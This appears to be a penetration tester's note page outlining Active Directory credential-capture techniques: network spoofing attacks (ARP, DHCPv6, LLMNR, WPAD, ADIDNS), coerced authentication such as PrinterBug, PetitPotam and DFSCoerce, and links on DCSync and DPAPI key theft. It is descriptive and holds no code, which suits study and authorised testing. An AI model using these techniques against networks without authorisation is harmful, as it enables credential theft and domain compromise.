Pentest - Domain Credential Access

Domain Credential Access

Clear-text credentials in the domain

Capture the hash

Network Attacks

• ARP Poisoning is possible when an attacker is sitting between the client and the server. The success ratio of this attack depends on the network topology and hardening. Also, it can cause severe network disruptions.
• DNS spoofing requires the attacker to introduce a malicious DNS server in the network for the clients via ARP/DHCPv6 spoofing. Then, the attacker can reply to the received client’s requests.
• DHCP poisoning happens by injecting a malicious WPAD or DNS server address into the client’s DHCP reply. The client’s request for wpad.dat will trigger a malicious server to request authentication.
• DHCPv6 spoofing is possible because IPv6 in Windows has higher priority than IPv4 and it is a multicast protocol. The attacker can provide the client with a malicious config and proceed with DNS spoofing later.
• Local-Link Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS), and Multicast Domain Name System (mDNS) spoofing are possible because of multicast name resolution protocols used in Windows environments. If DNS fails, these protocols will be used for resolution as a fallback option. The attacker can answer queries and then ask the client to authenticate.
• WSUS spoofing requires ARP poisoning and an evil WSUS server to deploy malicious updates to the clients.
• ADIDNS poisoning is an attack on Active Directory-integrated DNS. The idea is to inject malicious DDNS records.
• WPAD spoofing abuses the feature of helping clients locate proxy configuration scripts. After the MS16-077 security update, this attack is only possible through ADIDNS or DHCPv6 spoofing.

Forced authentication

• Harvesting NetNTLM If these network protocols are disabled and MITM is not really an option, there are a few ways we can force the client to authenticate to us. Recently, some intriguing research was published by MDSec. There are certain types of files that we can put on the writable share and Windows will automatically authenticate and send an NTLM response to a remote machine: SCF, URL, library-ms, and searchConnector-ms. An important remark is that the attacker’s machine should be within the local intranet zone, meaning that the network connection can be established by using a UNC path. The idea in the research was to use a WebDAV-enabled HTTP server to collect hashes, which is called farmer, and the tool to create files is called crop.
• MS-RPRN abuse (PrinterBug) The idea is that by using a domain username and password, the attacker can trigger the RpcRemoteFindFirstPrinterChangeNotificationEx method and force authentication over SMB.
• MS-EFSR abuse (PetitPotam) The Encrypting File System Remote (EFSR) protocol can be abused via a number of RPC calls, such as EfsRpcOpenFileRaw, to coerce Windows hosts to authenticate to other machines. This RPC interface is available through different SMB pipes, including \pipe\samr and \pipe\lsarpc.
• WebDAV Abuse
• MS-FSRVP abuse (ShadowCoerce) Microsoft’s File Server Remote VSS Protocol (MS-FSRVP) is used to make shadow copies on the remote computer. Two methods are supported. Invocation is possible through an SMB named pipe. An attack is not possible if File Server VSS Agent Service is not enabled on the target machine. Also, patch KB5014692 prevents coercion attacks.
• MS-DFSNM abuse (DFSCoerce) The same as other coerce methods, this one uses the RPC interface available through an SMB named pipe (\pipe\netdfs) in Microsoft’s Distributed File System Namespace Management protocol. Filip Dragovic found two methods (NetrDfsAddStdRoot and NetrDfsRemoveStdRoot) that can be used to force authentication.

Kerberos

• Attacking Kerberos

Automatic password management

NTDS Secrets

• Impacket - Secrets Dump

DCSync

• Pentest - Active Directory - DCSync

DPAPI

• Pentest - Active Directory - DPAPI Backup Key Theft